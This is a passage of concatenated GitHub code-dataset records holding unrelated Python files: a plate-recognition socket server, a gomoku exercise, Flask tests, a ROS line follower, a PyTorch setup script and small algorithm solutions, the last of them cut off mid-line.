finally:\r\n if(connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n print(\"Mysql connection is closed\")\r\n\r\nclass MyTCPHandler(socketserver.BaseRequestHandler):\r\n\r\n def handle(self):\r\n print(\"get....\")\r\n image1 = []\r\n try:\r\n while True:\r\n data=self.request.recv(5120) #拿到客戶端發送的數據 \r\n #print('data,',data)#照片=data\r\n # data = base64.b64decode(data)\r\n if not data or len(data) == 0:\r\n break\r\n image1.extend(data)\r\n \r\n \r\n image = np.asarray(bytearray(image1), dtype=\"uint8\")#映像陣列\r\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\r\n Image = imutils.resize(image,width=400,height=400)\r\n #Main.main(Image)###############throw my image inside py\r\n plateNumber=Main.main(Image)\r\n print(\"Platenumber send=\"+plateNumber)\r\n ######################\r\n insertVariblesIntoTable(plateNumber)#insert into mysql\r\n ######################\r\n self.request.sendall(plateNumber)##send car plate to client edit text##cant send\r\n print(\"I send it\")\r\n ################################################\r\n except Exception:\r\n print(self.client_address,\"連接斷開\")\r\n finally:\r\n self.request.close() #異常之後,關閉連接\r\n\r\n #before handle,連接建立:\r\n def setup(self):\r\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n print(now_time)\r\n print(\"連接建立:\",self.client_address)\r\n\r\n # finish run after handle\r\n def finish(self):\r\n print(\"釋放連接\")\r\n\r\n\r\nif __name__==\"__main__\":\r\n HOST,PORT = \"\",8004\r\n # server=socketserver.TCPServer((HOST,PORT),MyTCPHandler) #實例對象,傳入參數\r\n\r\n # 多線程\r\n server = socketserver.ThreadingTCPServer((HOST, PORT), MyTCPHandler)\r\n server.serve_forever() #一直運行\r\n\r\n\r\n","repo_name":"sadkala/FYP","sub_path":"TESTFY/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20819274519","text":"\"\"\"\n13. 完善控制台五子棋程序。\n\"\"\"\n# 定义棋盘的大小\nBOARD_SIZE = 15\n# 定义一个 维列表来充当棋盘\nboard = []\n\n\ndef init_board():\n # 为每个元素赋值”+\n for i in range(BOARD_SIZE):\n row = ['+'] * BOARD_SIZE\n board.append(row)\n\n\n# 在控制台输出棋盘的方法\ndef print_board():\n # 打印每个列表元素\n for i in range(BOARD_SIZE):\n for j in range(BOARD_SIZE):\n # 打印列表元素后不换行\n print (board[i][j], end='')\n # 每打印完一行列表元素后输出 个换行符\n print()\n\n\ninit_board()\nprint_board()\ninputStr = input('请输入您下棋的坐标,应以 x,y 的格式')\nwhile inputStr is not None:\n # 将用户输入的字符串以逗号( )作为分|满符,分隔成两个字符串\n x_str, y_str = inputStr.split(',')\n # 为对应的列表元素赋值”·\n board[int(y_str) - 1][int(x_str) - 1] = '·'\n\n '''\n 电脑随机生成两个整数,作为电脑下棋的坐标 赋{直给 board 列表\n 还涉及\n 1. 坐标的有效性,只能是数字,不能超出棋盘范围\n 2.下的棋的点,不能重复下棋\n 3. 每次下棋后,需要扫描谁赢了\n '''\n print_board()\n inputStr = input('请输入您下棋的坐标,应以x,y的格式:\\n')\n","repo_name":"Carlzkh/CrazyPythonNotes","sub_path":"exercise/four/4.13.py","file_name":"4.13.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33570261880","text":"n = int(input())\r\n\r\nstack = []\r\nans = []\r\ncur = 1\r\n\r\nfor _ in range(n):\r\n num = int(input())\r\n\r\n while cur <= num:\r\n stack.append(cur)\r\n ans.append(\"+\")\r\n cur += 1\r\n if stack[-1] == num:\r\n ans.append(\"-\")\r\n stack.pop()\r\n else:\r\n print(\"NO\")\r\n break\r\n\r\nelse:\r\n for x in ans:\r\n print(x)","repo_name":"dongjun-Yi/Algorithm","sub_path":"백준/Silver/1874. 스택 수열/스택 수열.py","file_name":"스택 수열.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15110812071","text":"import requests\r\n\r\napi = 'Your_oklink_api_key'\r\n\r\nheaders = {'Ok-Access-Key': api}\r\n\r\n\r\ndef read_file(filename):\r\n result = []\r\n with open(filename, 'r') as file:\r\n for tmp in file.readlines():\r\n result.append(tmp.replace('\\n', ''))\r\n\r\n return result\r\n\r\n\r\ndef write_to_file(filename, text):\r\n with open(filename, 'a') as file:\r\n file.write(f'{text}\\n')\r\n\r\n\r\ndef total_count_of_w3st(page, address):\r\n tw = 0\r\n params = {\r\n 'chainShortName': 'BSC',\r\n 'address': address,\r\n 'protocolType': 'token_721',\r\n 'limit': '50',\r\n 'page': page\r\n }\r\n\r\n data = requests.get(\r\n 'https://www.oklink.com/api/v5/explorer/address/address-balance-fills',\r\n params=params,\r\n headers=headers,\r\n ).json()['data'][0]\r\n\r\n total_pages = int(data['totalPage'])\r\n tokenList = data['tokenList']\r\n\r\n for token in tokenList:\r\n if token['token'] == 'WΞST':\r\n tw += 1\r\n\r\n return total_pages, tw\r\n\r\n\r\nfor address in read_file('addresses.txt'):\r\n total_w3sts = 0\r\n total_pages, tw = total_count_of_w3st(1, address)\r\n total_w3sts += tw\r\n\r\n for i in range(2, total_pages+1):\r\n total_pages, tw = total_count_of_w3st(i, address)\r\n total_w3sts += tw\r\n print(f'{address};{total_w3sts}')\r\n write_to_file('Result.txt', f'{address};{total_w3sts}')","repo_name":"viter0layer/W3ST-Parser","sub_path":"W3ST_Parser.py","file_name":"W3ST_Parser.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43485206449","text":"from flask import url_for\nfrom flask_login import current_user\nfrom TaskBoard.tests.base import BaseTestCase\nfrom TaskBoard.fakes import *\n\n\nclass BoardTestCase(BaseTestCase):\n def setUp(self) -> None:\n super(BoardTestCase, self).setUp()\n self.login()\n\n def test_index(self):\n response = self.client.get(url_for('taskboard.index'))\n data = response.get_data(as_text=True)\n self.assertIn('TaskBoard-LumiaO', data)\n self.assertIn('Boards', data)\n self.assertIn('Setting', data)\n self.assertIn('Logout', data)\n self.assertIn('Project Tree', data)\n self.assertIn('Milestone Column', data)\n self.assertIn('Task Column', data)\n\n def test_none_project(self):\n response = self.client.get(url_for('taskboard.none_project'))\n data = response.get_data(as_text=True)\n self.assertIn('There is not exist any project. ', data)\n\n def test_render_milestone_column(self):\n fake_Projects(1)\n fake_milestones(1)\n project = Project.query.get(1)\n project_id = project.id\n data = dict(project_id=project_id)\n with self.client:\n url = url_for('taskboard.render_milestone_column')\n response_data = self.post_data(url, data=dict(project_id='None'))\n self.assertIn('There is no default project', response_data)\n response_data = self.post_data(url, data=data)\n self.assertNotIn('There is no default project', response_data)\n\n def test_render_task_column(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n task = Task.query.get(1)\n task_id = task.id\n data = dict(task_id=task_id)\n with self.client:\n url = url_for('taskboard.render_task_column')\n response_data = self.post_data(url, data=None)\n self.assertNotIn('Description', response_data)\n self.assertNotIn('Add Attachment', response_data)\n self.assertNotIn('Add Comment', response_data)\n response_data = self.post_data(url, data=data)\n self.assertIn('Description', response_data)\n self.assertIn('Add Attachment', response_data)\n self.assertIn('Add Comment', response_data)\n\n def test_save_task_edit_modal(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n action_type_edit = 'edit'\n action_type_add = 'add'\n task_id = 1\n task_name = 'newTaskNameTest'\n task_description = 'emmmmmmmmmmmmmmm'\n assigned_user_id = 1\n category_id = 1\n milestone_id = 1\n color_text = '#888888'\n date_picker_text = '2019-10-24'\n points = '6'\n\n json_data = {\n 'action_type': action_type_edit,\n 'task_id': task_id,\n 'task_name': task_name,\n 'task_description': task_description,\n 'assigned_user_id': assigned_user_id,\n 'category_id': category_id,\n 'milestone_id': milestone_id,\n 'color_text': color_text,\n 'date_picker_text': date_picker_text,\n 'points': points\n }\n url = url_for('taskboard.save_task_edit_modal')\n with self.client:\n response = self.client.post(url, json=json_data)\n response_data = response.get_data(as_text=True)\n self.assertIn('edit-' + str(task_id), response_data)\n task = Task.query.get(task_id)\n self.assertEqual(task_name.title(), task.title)\n self.assertEqual(task_description, task.description)\n self.assertEqual(assigned_user_id, task.user_id)\n self.assertEqual(category_id, task.category_id)\n self.assertEqual(milestone_id, task.milestone_id)\n self.assertEqual(color_text, task.color)\n self.assertEqual(date_picker_text, task.due_date.strftime('%Y-%m-%d'))\n self.assertEqual(points, str(task.points))\n json_data['action_type'] = action_type_add\n response = self.client.post(url, json=json_data)\n response_data = response.get_data(as_text=True)\n task_id = response_data.split('-')[1]\n self.assertIn('add-' + str(task_id), response_data)\n task = Task.query.get(task_id)\n self.assertEqual(task_name.title(), task.title)\n self.assertEqual(task_description, task.description)\n self.assertEqual(assigned_user_id, task.user_id)\n self.assertEqual(category_id, task.category_id)\n self.assertEqual(milestone_id, task.milestone_id)\n self.assertEqual(color_text, task.color)\n self.assertEqual(date_picker_text, task.due_date.strftime('%Y-%m-%d'))\n self.assertEqual(points, str(task.points))\n\n def test_add_milestone_node(self):\n project_id = 1\n milestone_name = 'NewMilestoneName'\n with self.client:\n url = url_for('taskboard.add_milestone_node')\n response_data = self.post_data(url, data=dict(parent_id='None'))\n self.assertIn('fail', response_data)\n response_data = self.post_data(url, data=dict(parent_id=project_id, new_name=milestone_name))\n self.assertIn('ok', response_data)\n milestone = Milestone.query.filter_by(title=milestone_name.title()).first()\n self.assertEqual(milestone_name.title(), milestone.title)\n self.assertEqual(project_id, milestone.project_id)\n\n def test_rename_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n new_name = 'NewNameTest'.title()\n data = dict(type=node_type, id=node_id, new_name=new_name)\n with self.client:\n url = url_for('taskboard.rename_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n self.assertEqual(new_name, task.title)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n milestone = Milestone.query.get(node_id)\n self.assertEqual(new_name, milestone.title)\n data['type'] = 'project'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n project = Project.query.get(node_id)\n self.assertEqual(new_name, project.title)\n\n def test_copy_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n new_name = 'NewNameTest'.title()\n target_id = 1\n data = dict(type=node_type, id=node_id, new_name=new_name, target_id=target_id)\n with self.client:\n url = url_for('taskboard.copy_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n new_task = Task.query.filter_by(title=new_name).first()\n self.assertEqual(new_task.title, new_name)\n self.assertEqual(new_task.description, task.description)\n self.assertEqual(new_task.color, task.color)\n self.assertEqual(new_task.due_date, task.due_date)\n self.assertEqual(new_task.points, task.points)\n self.assertEqual(new_task.milestone_id, target_id)\n self.assertEqual(new_task.category_id, task.category_id)\n self.assertEqual(new_task.user_id, task.user_id)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n new_milestone = Milestone.query.filter_by(title=new_name).first()\n self.assertEqual(new_milestone.title, new_name)\n self.assertEqual(new_milestone.project_id, target_id)\n\n def test_move_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n target_id = 1\n data = dict(type=node_type, id=node_id, target_id=target_id)\n with self.client:\n url = url_for('taskboard.move_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n task = Task.query.get(node_id)\n self.assertEqual(task.milestone_id, target_id)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n milestone = Milestone.query.get(node_id)\n self.assertEqual(milestone.project_id, target_id)\n\n def test_delete_node(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n node_type = 'None'\n node_id = 1\n data = dict(type=node_type, id=node_id)\n with self.client:\n url = url_for('taskboard.delete_node')\n response_data = self.post_data(url, data=data)\n self.assertIn('None', response_data)\n data['type'] = 'task'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Task.query.get(node_id), None)\n data['type'] = 'milestone'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Milestone.query.get(node_id), None)\n data['type'] = 'project'\n response_data = self.post_data(url, data=data)\n self.assertIn('ok', response_data)\n self.assertEqual(Project.query.get(node_id), None)\n\n def test_task_attachment_upload(self):\n pass\n\n def test_download_task_attachment(self):\n pass\n\n def test_delete_task_attachment(self):\n pass\n\n def test_edit_or_add_comment(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n fake_comments(1)\n action = 'None'\n text = 'balabalabalabalabalabala'\n task_id = 1\n data = dict(action=action, text=text, task_id=task_id)\n with self.client:\n url = url_for('taskboard.edit_or_add_comment')\n response_data = self.post_data(url, data=data)\n self.assertIn('fail', response_data)\n data['action'] = 'add'\n response_data = self.post_data(url, data=data)\n self.assertIn('add', response_data)\n comment = Comment.query.filter_by(text=text).first()\n self.assertEqual(comment.user_id, current_user.id)\n self.assertEqual(comment.task_id, task_id)\n data['action'] = 'edit'\n data['comment_id'] = 1\n response_data = self.post_data(url, data=data)\n self.assertIn('edit', response_data)\n comment = Comment.query.get(1)\n self.assertEqual(comment.user_id, current_user.id)\n self.assertEqual(comment.task_id, task_id)\n self.assertEqual(comment.text, text)\n\n def test_delete_comment_by_id(self):\n fake_Projects(1)\n fake_Tags(1)\n fake_Users(1)\n fake_milestones(1)\n fake_categories(1)\n fake_tasks(1)\n fake_comments(1)\n comment_id = 1\n with self.client:\n url = url_for('taskboard.delete_comment_by_id')\n response_data = self.post_data(url, data=None)\n self.assertIn('None', response_data)\n response_data = self.post_data(url, data=dict(comment_id=comment_id))\n self.assertIn('ok', response_data)\n self.assertEqual(None, Comment.query.get(comment_id))\n\n def test_tree_json(self):\n pass\n","repo_name":"LumiaO-N9/TaskBoard","sub_path":"TaskBoard/tests/test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":12720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6012043091","text":"#!/usr/bin/env python\nimport rospy\nimport time\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import CompressedImage\nimport cv2, cv_bridge, numpy\nimport math\nfrom cv_bridge import CvBridge, CvBridgeError\nimport atexit\n\nclass OpenCVLineDetector:\n\n def __init__(self):\n self.bridge = cv_bridge.CvBridge()\n #cv2.namedWindow(\"window\", 1)\n self.image_sub = rospy.Subscriber(\"/raspicam_node/image/compressed\", CompressedImage, self.callback, queue_size=1)\n self.pub = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\n self.imageOut = rospy.Publisher('/line/image_raw', Image, queue_size=1)\n self.cmd = Twist()\n # P=0.4\n # I=0.002\n # D=0.03\n P=0.8\n I=0.0\n D=0 #0.1\n self.pid = PID(P, I, D)\n self.pid.SetPoint = 0.0\n P=0.005\n I=0.001\n D=0 #0.0015\n self.pidStrafe = PID(P, I, D)\n self.pidStrafe.SetPoint = 0.0\n atexit.register(self.cleanup)\n\n def cleanup(self):\n #Stop the robot\n self.pub.publish(Twist())\n\n def bottom(self, hsv, mask):\n #limit search to bottom of image\n h, w, d = hsv.shape\n search_top = 5*h/6\n search_bot = h\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n # edge = w/4\n # mask[0:h, 0:edge] = 0\n # mask[0:h, w-edge:w] = 0\n #find center of mask\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n err = cx - w/2\n return cx, cy, err\n\n #Safest to report center\n return -1, -1, -1\n\n def top(self, hsv, mask):\n #limit search to bottom of image\n h, w, d = hsv.shape\n search_top = 1*h/4\n search_bot = 3*h/4\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n #find center of mask\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n err = cx - w/2\n return cx, cy, err\n #Return error\n return -1, -1, -1\n\n def callback(self, msg):\n try:\n #### direct conversion to CV2 ####\n np_arr = numpy.fromstring(msg.data, numpy.uint8)\n cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n #cv_image = self.bridge.imgmsg_to_cv2(msg, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n return\n\n #convert to hsv\n hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n #filter out black\n lower = numpy.array([0,190,0])\n upper = numpy.array([180, 255, 90])\n mask = cv2.inRange(hsv, lower, upper)\n h, w, d = hsv.shape\n # mask[0:h, 0:0] = 0\n # mask[0:h, w-0:w] = 0\n #Create output image for displaying data to user\n output = cv2.bitwise_and(cv_image, cv_image, mask=mask)\n output = cv2.bitwise_not(output)\n #Find center line of Top and Botton\n #cxT, cyT, errT = self.top(hsv, mask.copy())\n width, cxT, cyT, contour = self.contours(mask.copy(), output)\n cxB, cyB, errB = self.bottom(hsv, mask.copy())\n #Display results\n cv2.circle(output, (cxT, cyT), 10, (255,0,0), -1)\n cv2.circle(output, (cxB, cyB), 10, (0,0,255), -1)\n cv2.imshow(\"window\", numpy.hstack([hsv,output]))\n cv2.waitKey(1)\n #Check for error state\n if cxT == -1 or cxB == -1:\n self.cmd.angular.z = 0\n self.cmd.linear.y = 0\n self.cmd.linear.x = 0\n if cxT > -1:\n self.cmd.linear.x = 0.05\n if cxB > -1:\n if cxB > w/2:\n self.cmd.linear.y = 0.05\n else:\n self.cmd.linear.y = -0.05\n self.pub.publish(self.cmd)\n return\n\n slope = numpy.arctan2(cyT - cyB, cxT - cxB)\n\n #Turn so the line is vertical, slope == -PI/2\n slopeErr = -math.pi/2 - slope\n #Send command to robot\n self.setCommand(zError = slopeErr, yError = errB, width = width)\n self.pub.publish(self.cmd)\n\n #imageToPub = self.bridge.cv2_to_compressed_imgmsg(numpy.array(output))\n imageToPub = self.bridge.cv2_to_imgmsg(output, encoding=\"bgr8\")\n self.imageOut.publish(imageToPub)\n\n def setCommand(self, zError, yError, width):\n #Update PID\n self.pid.update( feedback_value = -zError )\n self.pidStrafe.update( feedback_value = -yError )\n #Update command\n if width > 110:\n self.cmd.linear.x = 0.1\n self.cmd.angular.z = 0\n self.cmd.linear.y = 0\n else:\n self.cmd.linear.y = self.pidStrafe.output\n if abs(self.pidStrafe.output) > 0.1:\n self.cmd.linear.x = 0.0\n self.cmd.angular.z = 0.0\n else:\n self.cmd.linear.x = 0.2\n self.cmd.angular.z = self.pid.output\n\n\n def contours(self, mask, output):\n h, w, d = output.shape\n search_top = 3*h/6\n search_bot = 4*h/6\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n ret, thresh = cv2.threshold(mask, 127, 255, 0)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n if len(contours) != 0:\n # draw in blue the contours that were founded\n cv2.drawContours(output, contours, -1, 255, 3)\n\n # find the biggest area\n c = max(contours, key=cv2.contourArea)\n\n x, y, w, h = cv2.boundingRect(c)\n # draw the largest contour (in green)\n cv2.rectangle(output, (x, y), (x + w, y + h), (0, 255, 0), 2)\n cv2.drawContours(output, c, -1, (0, 255, 0), 3)\n M = cv2.moments(c)\n if M['m00'] > 0:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n cv2.circle(output, (cx, cy), 15, (0, 255, 0), -1)\n return w, cx, cy, c\n #Return error\n return -1, -1, -1, None\n\nclass PID:\n \"\"\"PID Controller\n \"\"\"\n\n def __init__(self, P=0.2, I=0.0, D=0.0):\n\n self.Kp = P\n self.Ki = I\n self.Kd = D\n\n self.sample_time = 0.00\n self.current_time = time.time()\n self.last_time = self.current_time\n\n self.clear()\n\n def clear(self):\n \"\"\"Clears PID computations and coefficients\"\"\"\n self.SetPoint = 0.0\n\n self.PTerm = 0.0\n self.ITerm = 0.0\n self.DTerm = 0.0\n self.last_error = 0.0\n\n # Windup Guard\n self.int_error = 0.0\n self.windup_guard = 20.0\n\n self.output = 0.0\n\n def update(self, feedback_value):\n \"\"\"Calculates PID value for given reference feedback\n\n .. math::\n u(t) = K_p e(t) + K_i \\int_{0}^{t} e(t)dt + K_d {de}/{dt}\n\n .. figure:: images/pid_1.png\n :align: center\n\n Test PID with Kp=1.2, Ki=1, Kd=0.001 (test_pid.py)\n\n \"\"\"\n error = self.SetPoint - feedback_value\n\n self.current_time = time.time()\n delta_time = self.current_time - self.last_time\n delta_error = error - self.last_error\n\n if (delta_time >= self.sample_time):\n self.PTerm = self.Kp * error\n self.ITerm += error * delta_time\n\n if (self.ITerm < -self.windup_guard):\n self.ITerm = -self.windup_guard\n elif (self.ITerm > self.windup_guard):\n self.ITerm = self.windup_guard\n\n self.DTerm = 0.0\n if delta_time > 0:\n self.DTerm = delta_error / delta_time\n\n # Remember last time and last error for next calculation\n self.last_time = self.current_time\n self.last_error = error\n\n self.output = self.PTerm + (self.Ki * self.ITerm) + (self.Kd * self.DTerm)\n\n def setKp(self, proportional_gain):\n \"\"\"Determines how aggressively the PID reacts to the current error with setting Proportional Gain\"\"\"\n self.Kp = proportional_gain\n\n def setKi(self, integral_gain):\n \"\"\"Determines how aggressively the PID reacts to the current error with setting Integral Gain\"\"\"\n self.Ki = integral_gain\n\n def setKd(self, derivative_gain):\n \"\"\"Determines how aggressively the PID reacts to the current error with setting Derivative Gain\"\"\"\n self.Kd = derivative_gain\n\n def setWindup(self, windup):\n \"\"\"Integral windup, also known as integrator windup or reset windup,\n refers to the situation in a PID feedback controller where\n a large change in setpoint occurs (say a positive change)\n and the integral terms accumulates a significant error\n during the rise (windup), thus overshooting and continuing\n to increase as this accumulated error is unwound\n (offset by errors in the other direction).\n The specific problem is the excess overshooting.\n \"\"\"\n self.windup_guard = windup\n\n def setSampleTime(self, sample_time):\n \"\"\"PID that should be updated at a regular interval.\n Based on a pre-determined sampe time, the PID decides if it should compute or return immediately.\n \"\"\"\n self.sample_time = sample_time\n\ndef listener():\n rospy.init_node('opencv_line_detector', anonymous=False)\n openCVLineDetector = OpenCVLineDetector()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n listener()\n","repo_name":"frankjoshua/gobbit","sub_path":"docker_ros_nodes/ros-thermal-dnn/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40051362274","text":"import csv\nfrom os import listdir\nfrom os.path import isfile, join, dirname, realpath\n\n# directory relative to the repository root where the image files are located\nrootFolder = 'dataset'\n\n# get full path of where to find files for the dataset\ndatasetPath = join(dirname(realpath(__file__)), '../', rootFolder)\nprint(\"Dataset Path {}\".format(datasetPath))\n\n# get all the file names\ndatasetFiles = [f for f in listdir(datasetPath) if isfile(join(datasetPath, f))]\n\n# write to csv\nwith open('character_description.csv', mode='w') as descFile:\n descriptionWriter = csv.writer(descFile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n for fileName in datasetFiles:\n rootRelativePath = join(rootFolder, fileName) # ie: dataset/A-123-2.jpeg\n classification = fileName[0] # first character in image name == classification\n\n # column 0 = filepath relative to repo root. column 1 = classification for that file\n descriptionWriter.writerow([rootRelativePath, classification])\n","repo_name":"len0rd/uav-character-classification","sub_path":"scripts/generate_dataset_csv.py","file_name":"generate_dataset_csv.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19153518920","text":"import argparse\nimport fileinput\nimport importlib\nimport logging\nimport os\nimport subprocess\nimport sys\n\nspec = importlib.util.spec_from_file_location(\"_common\",\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"./_common.py\"))\nc = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(c)\n\n\ndef add_arg_parser(parser):\n parser.add_argument('-d', '--debug', action='store_true',\n help='Set log level to Debug')\n parser.add_argument('-np', '--no_pyinstaller', action='store_true',\n help='Don\\'t install pyinstaller')\n parser.add_argument('--cpu', action='store_true',\n help='No cuda support')\n parser.add_argument('-pnc', '--pip_no_cache_dir', action='store_true',\n help='Use --no_cache_dir for pip commands')\n parser.add_argument('-pu', '--pip_user', action='store_true',\n help='Use --user for pip commands')\n\n\ndef check_dependencies():\n c.log.debug(\"OS : {}\".format(c.get_os()))\n c.log.debug(\"Python version : {}\".format(c.get_python_version()))\n\n if c.get_os() == c.OS.UNKNOWN:\n c.log.fatal(\"Unknown OS !\")\n exit(1)\n\n if c.get_python_version() < (3, 5):\n c.log.fatal(\"Unsupported python version !\")\n exit(1)\n\n\ndef pyinstaller(args, pip_commands_extend=None):\n if pip_commands_extend is None:\n pip_commands_extend = []\n\n c.log.info('Installing pyinstaller')\n r = subprocess.run([sys.executable, '-m', 'pip', 'install', 'pyinstaller'] + pip_commands_extend)\n if r.returncode != 0:\n c.log.fatal(\"Pyinstaller installation failed\")\n exit(1)\n c.log.info('Pyinstaller successfully installed')\n\n\ndef cli_setup(args, pip_commands_extend=None):\n if pip_commands_extend is None:\n pip_commands_extend = []\n\n def torch_version():\n if args.cpu:\n if c.get_os() == c.OS.LINUX:\n return \"https://download.pytorch.org/whl/cpu/torch-1.1.0-cp{0}{1}-cp{0}{1}m-linux_x86_64.whl\".format(\n *c.get_python_version())\n if c.get_os() == c.OS.MAC:\n return \"torch\"\n if c.get_os() == c.OS.WIN:\n return \"https://download.pytorch.org/whl/cpu/torch-1.1.0-cp{0}{1}-cp{0}{1}m-win_amd64.whl\".format(\n *c.get_python_version())\n else:\n if c.get_os() == c.OS.LINUX:\n return \"https://download.pytorch.org/whl/cu100/torch-1.1.0-cp{0}{1}-cp{0}{1}m-linux_x86_64.whl\".format(\n *c.get_python_version())\n if c.get_os() == c.OS.MAC:\n c.log.warning(\n \"# MacOS Binaries dont support CUDA, install from source if CUDA is needed. \"\n \"This script will install the cpu version.\")\n return \"torch\"\n if c.get_os() == c.OS.WIN:\n return \"https://download.pytorch.org/whl/cu100/torch-1.1.0-cp{0}{1}-cp{0}{1}m-win_amd64.whl\".format(\n *c.get_python_version())\n\n c.log.info('Installing Cli dependencies')\n path = c.create_temporary_copy(\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../requirements.txt\"), \"cli-requirements.txt\")\n with fileinput.FileInput(path, inplace=True) as f:\n for l in f:\n print(l.replace(\"torch==1.1.0\", torch_version()), end='')\n r = subprocess.run([sys.executable, '-m', 'pip', 'install', '-r', path] + pip_commands_extend)\n os.remove(path)\n if r.returncode != 0:\n c.log.fatal(\"Cli dependencies installation failed\")\n exit(1)\n c.log.info('Cli dependencies successfully installed')\n\n\ndef run(args):\n ## System & Dependencies Check\n check_dependencies()\n\n if args.debug:\n c.log.setLevel(logging.DEBUG)\n\n ## Cli dependencies\n pip_commands_extend = (['--user'] if args.pip_user else []) + (['--no-cache-dir'] if args.pip_no_cache_dir else [])\n\n ## Pyinstaller\n if not args.no_pyinstaller:\n pyinstaller(pip_commands_extend)\n\n cli_setup(args, pip_commands_extend)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='cli dependencies setup')\n add_arg_parser(parser)\n args = parser.parse_args()\n run(args)\n","repo_name":"thy1506/dreamtime","sub_path":"src/cli/scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9224424948","text":"# 868. Binary Gap\n#\n# Given a positive integer N, find and return the longest distance between two consecutive 1's in the binary representation of N.\n#\n# If there aren't two consecutive 1's, return 0.\n#\n# Example 1:\n#\n# Input: 22\n# Output: 2\n# Explanation:\n# 22 in binary is 0b10110.\n# In the binary representation of 22, there are three ones, and two consecutive pairs of 1's.\n# The first consecutive pair of 1's have distance 2.\n# The second consecutive pair of 1's have distance 1.\n# The answer is the largest of these two distances, which is 2.\n# Example 2:\n#\n# Input: 5\n# Output: 2\n# Explanation:\n# 5 in binary is 0b101.\n# Example 3:\n#\n# Input: 6\n# Output: 1\n# Explanation:\n# 6 in binary is 0b110.\n# Example 4:\n#\n# Input: 8\n# Output: 0\n# Explanation:\n# 8 in binary is 0b1000.\n# There aren't any consecutive pairs of 1's in the binary representation of 8, so we return 0.\n#\n\nclass Solution:\n def binaryGap(self, number: int) -> int:\n binval=bin(number)\n positions=[]\n for i in 